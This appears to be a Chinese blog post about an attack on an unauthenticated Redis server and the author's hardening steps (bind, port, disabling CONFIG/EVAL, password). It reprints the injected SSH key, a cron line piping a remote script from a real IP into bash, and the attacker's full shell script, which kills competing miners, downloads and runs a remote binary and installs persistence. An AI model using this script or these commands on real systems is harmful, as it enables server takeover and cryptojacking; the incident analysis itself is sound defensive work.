linux stoping redis,linux服务器保险—— 一次redis攻击的遭遇

最新推荐文章于 2023-01-17 14:42:33 发布
最新推荐文章于 2023-01-17 14:42:33 发布
阅读量492 收藏
点赞数
文章标签: linux stoping redis

打开redis客户端,发现redis中被存入了两个莫名其妙的东西,key值分别为crackit和gfpyskqrma,我很确定自己的程序不会向redis中存入这两个东西。

admin@VM-202-164-ubuntu:/$ /servers/redis-2.8.19/src/redis-cli -p 6379

127.0.0.1:6379> keys *

1) "crackit"

2) "gfpyskqrma"

查看这两个都存的什么东西:

127.0.0.1:6379> get crackit

"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCV6En/yo9BrY7ba0BsiFbg2hxLVdNerk1r3oKU1V0qeVMzRG8WdXkAiEXcvcmei1c85gPXDK3bqUX1XyLOy+hXfnTRRGfbMPOCclyoT/L3xeS1KMvWlP0qJVip7Mz+gwCEkQxSbZqdzBHStSFgAzoeGf12wUKEHLEpX7x7bs03vMUB8z7i1f10N+is84THQ4lMCpG4w3+CdeOKEssL2nL5abRhItjrfYgQH5cxtpwq55w97mVQ7PR9U2JSQSVWMTxy3rTx+7QP4JI2RS5yDRsjH4ISVwvu3gGyYAPfa6yofK+jjqChkyX4ipmTP9hAXf7lEvoZClVjCAwg1qslKieH aariz@el8.land\n\n\n\n"

127.0.0.1:6379> get gfpyskqrma

"\n\n* 10 * * * curl http://45.123.190.144:8080/lin.txt?redis | bash \n\n"

妥了,现在百分百确定服务器遭到了攻击。crackit存的是一个ssh公钥,gfpyskqrma存储的是一个cron定时任务。

看到这我就气急败坏了,连我吃泡面省钱买的云服务都不放过!不管三七二十一了,先一顿喷再说,直接在这两个key的值中喷他,也不管攻击者能不能看到啦,由于不清楚他是哪国的,中文英文拼音都用上一遍。哼!

好了,进入正题!现在研究一下他是怎么攻击的,打开redis config:

127.0.0.1:6379> CONFIG GET *

1) "dbfilename"

2) "root"

3) "requirepass"

4) ""

5) "masterauth"

6) ""

7) "unixsocket"

8) ""

9) "logfile"

10) ""

11) "pidfile"

12) "/var/run/redis.pid"

13) "maxmemory"

14) "0"

15) "maxmemory-samples"

16) "3"

17) "timeout"

18) "0"

19) "tcp-keepalive"

20) "0"

21) "auto-aof-rewrite-percentage"

22) "100"

23) "auto-aof-rewrite-min-size"

24) "67108864"

25) "hash-max-ziplist-entries"

26) "512"

27) "hash-max-ziplist-value"

28) "64"

29) "list-max-ziplist-entries"

30) "512"

31) "list-max-ziplist-value"

32) "64"

33) "set-max-intset-entries"

34) "512"

35) "zset-max-ziplist-entries"

36) "128"

37) "zset-max-ziplist-value"

38) "64"

39) "hll-sparse-max-bytes"

40) "3000"

41) "lua-time-limit"

42) "5000"

43) "slowlog-log-slower-than"

44) "10000"

45) "latency-monitor-threshold"

46) "0"

47) "slowlog-max-len"

48) "128"

49) "port"

50) "6379"

51) "tcp-backlog"

52) "511"

53) "databases"

54) "16"

55) "repl-ping-slave-period"

56) "10"

57) "repl-timeout"

58) "60"

59) "repl-backlog-size"

60) "1048576"

61) "repl-backlog-ttl"

62) "3600"

63) "maxclients"

64) "10000"

65) "watchdog-period"

66) "0"

67) "slave-priority"

68) "100"

69) "min-slaves-to-write"

70) "0"

71) "min-slaves-max-lag"

72) "10"

73) "hz"

74) "10"

75) "repl-diskless-sync-delay"

76) "5"

77) "no-appendfsync-on-rewrite"

78) "no"

79) "slave-serve-stale-data"

80) "yes"

81) "slave-read-only"

82) "yes"

83) "stop-writes-on-bgsave-error"

84) "no"

85) "daemonize"

86) "no"

87) "rdbcompression"

88) "yes"

89) "rdbchecksum"

90) "yes"

91) "activerehashing"

92) "yes"

93) "repl-disable-tcp-nodelay"

94) "no"

95) "repl-diskless-sync"

96) "no"

97) "aof-rewrite-incremental-fsync"

98) "yes"

99) "aof-load-truncated"

100) "yes"

101) "appendonly"

102) "no"

103) "dir"

104) "/var/spool/cron"

105) "maxmemory-policy"

106) "volatile-lru"

107) "appendfsync"

108) "everysec"

109) "save"

110) "900 1 300 10 60 10000"

111) "loglevel"

112) "notice"

113) "client-output-buffer-limit"

114) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"

115) "unixsocketperm"

116) "0"

117) "slaveof"

118) ""

119) "notify-keyspace-events"

120) "gxE"

121) "bind"

122) "127.0.0.1 XXX.XXX.XXX.XXX" #此处马赛克

127.0.0.1:6379>

可以看到,攻击者修改了redis用于存储数据的rdb文件的文件名和路径,路径和文件拼凑到一起是/var/spool/cron/root。这是要改我root用户计划任务的节奏啊,还好我的redis不是使用root用户执行的(这就是redis日志中出现大量权限不足的原因),要不然攻击者已经得手了。想想就可怕,如果我的redis是使用root用户部署的,那攻击者岂不是为所欲为了。例如他如果把SSH公钥写到/root/.ssh中,就可以畅通无阻地登录我的服务器,或者他直接破坏掉我的/etc/passwd,那谁也别想登录了,只能刷系统了。没想到redis居然有这么大的漏洞。(通过redis的CONFIG SET dir /tmp/ 命令就可以直接动态设置存储路径了,其他参数的设置也一样)

还没完。现在看一下他的定时脚本里边都是什么内容,直接浏览器打开http://45.123.190.144:8080/lin.txt?redis ,以下就是他的shell代码:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

HOST=45.123.190.144:8080

CALLBACK=$HOST

DOWNLOADER="curl "

#DOWNLOADER="wget -q -O - "

LFILE_NAME="BoomBoom"

# LFILE_PATH=`pwd`/$LFILE_NAME

LFILE_PATH=/tmp/$LFILE_NAME

DEFAULT_RFILE=$HOST/BoomBoom

OTHERS_RFILE=$HOST/BoomBoom2

CLEAN ()

{

grep -q -F '* soft memlock 262144' /etc/security/limits.conf || echo '* soft memlock 262144' >> /etc/security/limits.conf

grep -q -F '* hard memlock 262144' /etc/security/limits.conf || echo '* hard memlock 262144' >> /etc/security/limits.conf

grep -q -F 'vm.nr_hugepages = 256' /etc/sysctl.conf || echo 'vm.nr_hugepages = 256' >> /etc/sysctl.conf

sysctl -w vm.nr_hugepages=256

RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon)

KILIST=(crobon sb1 wipefs AnXqV.yam zhuabcn@yahoo.com monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)

for item in ${RMLIST[@]}

do

rm -rf $item

done

for item in ${KILIST[@]}

do

ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9

done

days=$(($(date +%s) / 60 / 60 / 24))

ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9

pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4

pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB

pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df

pkill -f cpuloadtest

pkill -f crypto-pool

pkill -f xmr

pkill -f prohash

pkill -f monero

pkill -f miner

pkill -f nanopool

pkill -f minergate

pkill -f yam

pkill -f Silence

pkill -f yam2

pkill -f minerd

pkill -f Circle_MI.png

pkill -f curl

ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9

pkill -f biosetjenkins

ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9

ps ax|grep -o './[0-9]* -c'| xargs pkill -f

pkill -f Loopback

pkill -f apaceha

pkill -f cryptonight

ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs ps --ppid|awk '{print $1}'|grep -v PID|xargs kill -9

ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs kill -9

pkill -f 45.76.102.45

pkill -f stratum

pkill -f mixnerdx

pkill -f performedl

pkill -f sleep

pkill -f JnKihGjn

pkill -f irqba2anc1

pkill -f irqba5xnc1

pkill -f irqbnc1

pkill -f ir29xc1

pkill -f conns

pkill -f irqbalance

pkill -f crypto-pool

pkill -f minexmr

pkill -f XJnRj

pkill -f NXLAi

pkill -f BI5zj

pkill -f askdljlqw

pkill -f minerd

pkill -f minergate

pkill -f Guard.sh

pkill -f ysaydh

pkill -f bonns

pkill -f donns

pkill -f kxjd

pkill -f 108.61.186.224

pkill -f Duck.sh

pkill -f bonn.sh

pkill -f conn.sh

pkill -f kworker34

pkill -f kw.sh

pkill -f pro.sh

pkill -f polkitd

pkill -f acpid

pkill -f icb5o

pkill -f nopxi

ps -ef|grep '.so'|grep -v grep|cut -c 9-15|xargs kill -9;

pkill -f 45.76.146.166

pkill -f irqbalanc1

pkill -f 188.120.247.175

rm -rf /tmp/httpd.conf

rm -rf /tmp/conn

rm -rf /tmp/conns

rm -f /tmp/irq.sh

rm -f /tmp/irqbalanc1

rm -f /tmp/irq

}

DEFAULT ()

{

$DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH

chmod +x $LFILE_PATH

ps -ef|grep $LFILE_NAME|grep -v grep

if [ $? -ne 0 ]; then

$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"

else

$DOWNLOADER "${CALLBACK}/?info=l69"

fi

}

OTHERS ()

{

$DOWNLOADER $OTHERS_RFILE > $LFILE_PATH

chmod +x $LFILE_PATH

ps -ef|grep $LFILE_NAME|grep -v grep

if [ $? -ne 0 ]; then

$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"

else

$DOWNLOADER "${CALLBACK}/?info=l39"

fi

}

CRON () {

if [ -x /usr/bin/wget ] ; then

echo '*/8 * * * * wget -q -O - $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron

elif [ -x /usr/bin/curl ] ; then

echo '*/8 * * * * curl $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron

else

exit 0;

fi

crontab -r

crontab /tmp/.$LFILE_NAME.cron

rm /tmp/.$LFILE_NAME.cron

}

INIT () {

echo 128 > /proc/sys/vm/nr_hugepages

sysctl -w vm.nr_hugepages=128

}

KILL () {

ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid

do

kill -9 $procid

done

}

CLEAN

KILL

INIT

if [ $(getconf WORD_BIT) = '32' ] && [ $(getconf LONG_BIT) = '64' ] ; then

DEFAULT

else

OTHERS

fi

# CRON

crontab -r

等一下再看这个浑蛋做了什么,当务之急是解决redis的问题,切断他的攻击渠道。

先关掉redis吧

dmin@VM-202-164-ubuntu:~$ ps -aux|grep redis|grep -v grep

admin 10167 0.0 1.3 38300 12136 ? Sl Feb03 1:27 /servers/redis-2.8.19/src/redis-server 127.0.0.1:6379

admin@VM-202-164-ubuntu:~$ kill -9 10167

admin@VM-202-164-ubuntu:~$ ps -aux|grep redis|grep -v grep

admin@VM-202-164-ubuntu:~$

进入redis目录,修改redis配置文件。

admin@VM-202-164-ubuntu:~/redis-2.8.19$ vi redis.conf

先修改一下bind:(说明一下:修改之前我是这样配置的bind 127.0.0.1 XXX.XXX.XXX.XXX,其中xxx是腾讯云服务器的内网ip,所以我没理解错的话,攻击者是使用腾讯云内网ip登录我的redis服务的。也就是说攻击者使用的也是腾讯云服务器)

# Examples:

#

# bind 127.0.0.1 XXX.XXX.XXX.XXX

bind 127.0.0.1

再改下端口吧,不要用默认的了:

# Accept connections on the specified port, default is 6379.

# If port 0 is specified Redis will not listen on a TCP socket.

port 6970

禁用掉CONFIG和EVAL命令:

# Example:

#

# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52

#

# It is also possible to completely kill a command by renaming it into

# an empty string:

#

rename-command CONFIG ""

rename-command EVAL ""

还有最关键的,设置一个密码:

# Warning: since Redis is pretty fast an outside user can try up to

# 150k passwords per second against a good box. This means that you should

# use a very strong password otherwise it will be very easy to break.

#

requirepass 2wsx!QAZ

启动redis吧,现在应该足够安全了吧:

admin@VM-202-164-ubuntu:~/redis-2.8.19$ /servers/redis-2.8.19/src/redis-cli -p 6970 -a '2wsx!QAZ'

启动客户端别忘记加上密码。最后就是修改应用程序中的redis端口和密码了。如果想要在其他服务器上也能访问到redis服务,那就只能bind上内网ip了,但是推荐使用iptables创建防火墙规则。

一定不要使用root部署redis,太可怕了。

现在redis基本安全了,不用担心再次受到攻击了,但是还要检查一下服务器,看看那个攻击者有没有留下什么东西,清理一下。

admin@VM-202-164-ubuntu:~$ cd .ssh

-bash: cd: .ssh: No such file or directory

admin@VM-202-164-ubuntu:~$ crontab -l

no crontab for admin

admin@VM-202-164-ubuntu:~$

admin@VM-202-164-ubuntu:/var/spool/cron$ ls -lrta

total 20

drwxrwx--T 2 daemon daemon 4096 Jan 15 2016 atspool

drwxr-xr-x 4 root root 4096 Oct 26 2016 ..

drwxr-xr-x 5 root root 4096 Oct 26 2016 .

drwxrwx--T 2 daemon daemon 4096 Oct 26 2016 atjobs

drwx-wx--T 2 root crontab 4096 Feb 4 18:51 crontabs

admin@VM-202-164-ubuntu:/var/spool/cron$ cd crontabs

-bash: cd: crontabs: Permission denied

攻击者并没有将SSH公钥写入当前用户,crontabs权限正常,是安全的,看来他直接是奔着root去的,并没有得手。如此看来,这应该是一个攻击脚本了,那看来我喷他他是看不到了,唉!

最后看一下那个脚本都想要干什么吧:

先是清了一下相关进程和临时文件->>杀掉了cpu占用大于20%的进程->>设置了一下nr_hugepages->>在他的服务器(45.123.190.144:8080/BoomBoom)上下载一个BoomBoom->>BoomBoom添加可执行权限。好吧,不明觉厉,下载了BoomBoom看看,2.17M的一个东西,不知道是什么。

蒋伯雍
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅谈Linux下的redis攻击
qq_64201116的博客
10-17 5185
redis服务ip:192.168.65.163 (CentOs)redis服务ip:192.168.65.158 (Ubuntu)kali攻击机:192.168.65.158。
Redis Docker容器安全性防护,防止入侵】
诗和远方,代码和你
07-24 1422
■ 需求背景 为团队构建测试环境缓存 ■ 实现步骤 Step. Docker Hub上找镜像: Step. Docker Hub上拉指定版本镜像: Step. 查看镜像: Step. 新建配置文件: Step. 创建脚本并运行 Step. 测试连接: Step. 测试监控:,键入 Step. 查看宿主机数据目录:,发现挂载成功Step.查看redis数据 + log + pid文件存储的默认目录dir:,结果若不是 /data,则设置一下: 备注 1)可以设置redis密码:,下次连接redis客户端,需经
数据库攻防之Redis
m0_71745754的博客
01-17 999
Redis(Remote Dictionary Server)是一个由 Salvatore Sanfillppo 写的 key-value存储系统。是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库,并提供多种语言的API。通常被称为数据结构服务器,因为值(value)可以是字符串(string)、哈希(hash)、列表(list)、集合(sets)和有序集合(sortedsets)等类型。
修补--Redis未授权访问漏洞
weixin_30342209的博客
01-09 322
--------------------------------阿里云解决方案-----------------------------------一.漏洞描述Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服...
服务器配置redis后警告对外攻击
qq_56393773的博客
08-17 779
被警告自己的云服务器在对外攻击解决方案
matlab均方误差的代码-NYTRO:卡莫里亚诺(Camoriano,R.^),安格斯(Angles),T。^,鲁迪(Rudi),A。和罗萨
05-23
在NYTRO中,我们结合了早期停止和二次采样的思想,提出了一种基于早期停止和二次采样的随机迭代正则化形式。 这样,我们克服了精确的Early Stoping算法(例如内核化的Landweber迭代)的内存瓶颈。 此外,
联想ih61m v1.0 主板bios固件,版本 9QKT39A,添加了Nvme驱动,bios版本信息是9qkt开头的都可以刷
04-13
- Fix stoping at logo screen when no disc in USB ODD. CHANGES for 9QKT38A/9QJT38A - Update CPU Microcode for 206A7 to 28h. CHANGES for 9QKT39A/9QJT39A - Prevent waiting too long while connecting ...
Delphi Logger
12-09
//如果要写的日志文件和打开的不同(在程序第一次运行和跨天的时候出现) //则关闭打开的日志文件。 if filename <> log_filename then begin log_filename := filename; if Assigned(log_fileStream) then ...
parabola-simulator:3在3D图形的重力场中绘制对象的轨迹
05-14
The ball will keep going through the own way, both not stoping or bouncing on the ground. There is no GROUND to give any force to the ball.怎么跑1. clone the repository into your desktop.2. make a py
Android代码-ChronometerPersist
08-06
//Stoping the chronometer stopChronometer(); //Pausing the chronometer pauseChronometer(); Status Checking Methods //Checking status isRunning(); isPaused(); Format-Changing Method //if true then c
拯救redis攻击后的服务器
CheerTan is here
02-05 2458
现象描述 最直观的就是服务器CPU居高不下,服务器里的nginx服务不断被关停,redis6379端口不断被各种服务器连接,而且每5s中就切换一次连接任务,后来查看定时任务里赫然出现一个定时脚本,每30分钟便执行一次,定时任务无法修改,病毒文件无法删除,详情见下图: 原因分析 根本原因在于开启了redis并选用了默认端口并用root权限启动,最致命的就是没有设密码暴露在公网,当时为了调试只开放了5小时左右,服务器就已中招。 病毒脚本分析 #!/bin/sh #暂时关闭SELINUX,以方便后续永久关
一次愚蠢的Redis配置导致Linux服务器被恶意攻击
u012708900的博客
12-23 770
起因 之前Linux服务器上面一直启的Redis单机,并设置了密码。也没出现过问题。对安全这方面也不太敏感。 前天重新搭建了Redis集群(一主两从三哨兵),都只是做了最简单的配置,期初master配置中是有密码的,但是在配置slave时,没有添加masterauth配置项(因为无知,- -!),导致主从复制一直失败,索性就把master中的requirepass给注释掉了。再次重启主从复制成功了,哨兵的配置也成功启动,发现模拟故障转移也莫得问题,就认为万事大吉了。 经过 然而昨天中午的时候,收到了阿里云的
redis服务器攻击,服务器CentOS Linux release 7.6.1810 (Core)
qq_35456400的博客
06-23 1787
没想到这么容易被攻击了,密码是简单密码,端口号是默认的6379。可能太容易被破解了,换了下端口号还是不行。第二天sentinel的大量报这个错。 2738:X 23 Jun 2020 15:28:24.004 * +fix-slave-config slave 127.0.0.1:5480 127.0.0.1 5480 @ mymonitor 127.0.0.1 5479 2738:X 23 Jun 2020 15:28:34.104 * +fix-slave-config slave 127.0.0..
redis攻击总结
灰太的表格的博客
02-24 1863
redis的那几种攻击方式在这几年的赛题还是实战中几乎已经被玩烂了,原理也就那些东西,主要就是通信的RESP协议,所以再总结感觉也可能也学不到太多东西,所以就直接看了xq17师傅的文章感觉写的很好就直接转载了xq17师傅的文章,但是师傅这里写错了一个问题,就是redis在高版本中module load出错的原因不是exp的不规范,而是在高版本中增加了相关的权限验证,详情在https://github.com/redis/redis/pull/6257 这个commit里面 注:以下内容原创来自于xq17师傅
Centos上由于redis漏洞被攻击
半僧
12-06 1746
早上一直收到腾讯云报警,查看了下: 有个yam程序,占用大量CPU!!! 真他娘的纳闷,我服务器跑了什么我还不清楚?于是乎开始查哪来的? 于是我去百度了下 jyam -c x -M stratum+tcp 果不其然确实有这样的攻击,网上说这个攻击是由于redis未授权登陆漏洞引 起导致黑客利用的结果我去redis 控制台登录一看固然有个莫名其妙的key 刚好这个key 就是ssh的
记录Redis一次攻击事件
孤城长烟
03-12 2486
买了阿里云的一台服务器自己玩的,今天发现Redis攻击了,执行crontab的时候,发现莫名其妙的任务。一开始也搞不懂哪里被攻击了,上午查了一下,刚好看到一篇关于redis攻击的文章。结合自己的情况,发现果然是这样的。
一次Redis数据库漏洞被入侵现象
java、c++、机器学习方向King
03-21 6449
服务器状态:为了便于研发,把公司购买的云服务器上的一台内网服务器,主要目的是,把开放服务器上的Redis数据库服务,便于相关研发人员调用使用。出现的现象问题:CPU基本满负荷(估计是被当做肉鸡),出现SSH登录不上服务器的情况。挂了电话后我就登上了阿里云账号,看了一下自己Mem和CPU的使用状况,Mem倒没撒,CPU确实一直是一条直线,一直是百分之百。后来我就看了ps -aux看了进程cpu和内存...
redis 安全漏洞导致服务器攻击
Golden_lion的博客
03-01 3849
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
linux服务器安全—— 一次redis攻击遭遇
小木头的专栏
02-04 1404
笔者在写这篇文章的时候,个人的服务器正在遭受攻击,为了避免更多的人被坑,笔者淡定地边处理边写下这篇博客,希望可以帮助到大家!   环境: ubuntu16.04.1 云服务器 redis 部署于tomcat上的个人应用   背景: 查看服务器状态时,发现redis用户的cpu使用率过高,打开redis日志,发现大量如下信息: [10167] 04 Feb 19:05:20.065 * 1 cha...
android studio keep stoping
最新发布
10-15
这可能是由于多种原因引起的,例如您的计算机配置不足、软件版本不兼容、插件冲突等。您可以尝试以下解决方法: 1. 确保您的计算机符合 Android Studio 的最低系统要求。 2. 更新 Android Studio 到最新版本。 3. 禁用或删除可能与 Android Studio 冲突的插件。 4. 清除 Android Studio 的缓存和临时文件。 5. 重新安装 Android Studio。 如果以上方法都无法解决问题,您可以尝试在 Android Studio 的安装目录下找到日志文件,查看错误信息以获取更多帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值